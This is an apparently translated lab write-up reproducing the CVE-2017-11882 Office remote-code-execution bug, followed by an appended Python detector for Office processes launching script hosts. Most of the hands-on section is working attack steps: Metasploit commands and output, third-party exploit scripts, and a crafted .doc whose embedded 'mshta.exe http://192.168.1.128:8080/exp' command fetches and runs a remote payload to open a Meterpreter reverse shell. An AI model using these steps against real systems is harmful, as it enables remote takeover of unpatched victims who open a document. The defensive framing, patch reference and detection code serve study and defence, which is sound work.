Vulnerability Reproduction: CVE-2017-11882 Office Remote Code Execution and Some Thoughts

XT 2020-03-02 21:48:00


0x01 Overview

As the previous generation's "works everywhere" Office vulnerability, CVE-2017-11882 is a typical APT-grade bug and is frequently seen in APT detection samples. It lay dormant for 17 years before being disclosed in 2017, and it affects every version of Office from 2003 through 2016: an attacker only needs to send the target a crafted Word document, and the attack completes as soon as that document is opened. This experiment walks through the full exploitation process so that the related defensive work can be better informed.

Affected versions:
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016

0x02 Hands-on

Based on the available material, there are two main approaches worth trying: the MSF module, and some tools written by other researchers.

Approach 1: the MSF module office_ms17_11882
  1. msf>use exploit/windows/fileformat/office_ms17_11882

  2. Set the listening host
    msf>set lhost 192.168.1.128

  3. Set the uripath
    msf>set uripath 111.doc

    msf exploit(office_ms17_11882) > show options

    Module options (exploit/windows/fileformat/office_ms17_11882):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    FILENAME msf.rtf yes Filename to save as
    SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT 8080 yes The local port to listen on.
    SSL false no Negotiate SSL for incoming connections
    SSLCert no Path to a custom SSL certificate (default is randomly generated)
    URIPATH 111.doc no The URI to use for this exploit (default is random)

    Payload options (windows/x64/meterpreter/reverse_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
    LHOST yes The listen address
    LPORT 4444 yes The listen port

    Exploit target:

    Id Name
    -- ----
    0 Automatic
  4. run

    msf exploit(office_ms17_11882) > exploit
    [*] Using URL: http://0.0.0.0:8080/111.doc
    [*] Local IP: http://127.0.0.1:8080/111.doc
    [*] Server started.
    [+] msf.,rtf stored at /root/.msf4/local/msf.rtf
  5. Open the file on the victim machine
    [screenshot] Office 2013: failed
    [screenshot] Office 2007: failed
    msf never received the reverse connection:

    msf>
    ......
    [*] Delivering payload to 192.168.1.105 ...
    [*] Delivering payload to 192.168.1.105 ...
    [*] Delivering payload to 192.168.1.105 ...
Approach 2: standalone scripts

The tools used here are:
https://github.com/Ridter/CVE-2017-11882/
https://github.com/starnightcyber/CVE-2017-11882
Reference article: https://www.cnblogs.com/Hi-blog/p/7878054.html

First, test whether the vulnerability is present, using the script from https://github.com/Ridter/CVE-2017-11882/

>python Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve-2017-11882.doc

[*] Done ! output file --> cve-2017-11882.doc

Testing the pop-up RTF:
[screenshot] triggered on Office 2010
[screenshot] triggered on Office 2013
The vulnerability is present, so the next step is to attempt further exploitation.
This uses the msf script from https://github.com/starnightcyber/CVE-2017-11882.
Put the script PS_shell.rb under a path inside the Metasploit exploit modules directory:

mkdir /usr/share/metasploit-framework/modules/exploits/windows/new-exp && mv PS_shell.rb /usr/share/metasploit-framework/modules/exploits/windows/new-exp/

Load it in msf:

msf> use exploit/windows/new-exp/PS_shell
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf exploit(PS_shell) > set uripath exp
uripath => exp1711882
msf exploit(PS_shell) > show options

Module options (exploit/windows/new-exp/PS_shell):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH exp no The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.128 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(PS_shell) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.128:4444
[*] Using URL: http://0.0.0.0:8080/exp
[*] Local IP: http://127.0.0.1:8080/exp
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.128:8080/exp"

Next, use the script to generate the exploit document carrying the command shown above:

python Command_CVE-2017-11882.py  -c  "mshta.exe http://192.168.1.128:8080/exp " -o exp_recon3.doc
[*] Done ! output file >> exp_recon3.doc <<

Here it turned out that the script cannot accept a command longer than 43 characters, so the uripath has to be chosen accordingly when producing the command.

The document is sent to the target; once it is opened, the exploit succeeds and a Meterpreter session comes up.

0x03 Summary

In summary, the built-in msf module did not succeed in this experiment; in practice, exploitation seems to have to go through the scripts written by individual researchers.

0x04 Suggested Directions for Further Research

To help readers study this further, here are some follow-up research ideas to build on:

  1. From the code side, investigate Office itself and analyse the underlying mechanism, especially the script's command-length limit and why the msf module failed
  2. Collect and analyse real-world cases and social-engineering campaigns that paired with this vulnerability
  3. From the monitoring and detection side, think about how to detect this, how such detection is evaded, and how to optimise it further
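On the detection side raised in item 3, here is an added example that is not part of the original post: a small Python checker that runs over constructed process-creation records and flags a script host or shell launched from an Office process, including the Equation Editor host (EQNEDT32.EXE) that this CVE lives in, which is how the mshta.exe stager used above would show up in endpoint telemetry. The record format, field names and process-name lists are assumptions, not from the write-up.

```python
import re
from typing import Dict, List

# Office-family processes (plus the Equation Editor host in which the
# CVE-2017-11882 bug lives) that should almost never spawn shells or
# script hosts. Assumed process names from standard Office installs.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SUSPICIOUS_CHILDREN = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed record of the form 'timestamp|parent|image|cmdline'."""
    ts, parent, image, cmdline = line.split("|", 3)
    return {"ts": ts,
            "parent": parent.rsplit("\\", 1)[-1].lower(),
            "image": image.rsplit("\\", 1)[-1].lower(),
            "cmdline": cmdline}


def flag_office_child_launches(lines: List[str]) -> List[Dict[str, str]]:
    """Return the events where an Office process launched a script host or shell."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev["parent"] in OFFICE_PARENTS and ev["image"] in SUSPICIOUS_CHILDREN:
            m = URL_RE.search(ev["cmdline"])          # remote stager, if any
            ev["reason"] = "office->%s" % ev["image"]
            ev["url"] = m.group(0) if m else ""
            hits.append(ev)
    return hits


# Constructed sample telemetry (not real logs): a normal Word start, the
# Equation Editor being hosted, the mshta.exe stager from the write-up,
# and an unrelated shell started by the user from Explorer.
SAMPLE_EVENTS = [
    "2020-03-02T21:40:01|C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE|WINWORD.EXE /n exp_recon3.doc",
    "2020-03-02T21:40:03|C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE|C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE|EQNEDT32.EXE -Embedding",
    "2020-03-02T21:40:04|C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE|C:\\Windows\\System32\\mshta.exe|mshta.exe \"http://192.168.1.128:8080/exp\"",
    "2020-03-02T21:41:00|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c dir",
]

if __name__ == "__main__":
    for hit in flag_office_child_launches(SAMPLE_EVENTS):
        print(hit["ts"], hit["reason"], hit["url"])
```

Only the mshta.exe launch from EQNEDT32.EXE is flagged; the Equation Editor start itself is not, since any document with an equation object produces it.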

0x05 References

https://www.jianshu.com/p/b6bc1ba0c997
https://www.cnblogs.com/Hi-blog/p/7878054.html
https://www.cnblogs.com/pshell/p/7875416.html
https://github.com/embedi/CVE-2017-11882
https://github.com/starnightcyber/CVE-2017-11882
https://github.com/Ridter/CVE-2017-11882/
Official patch: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882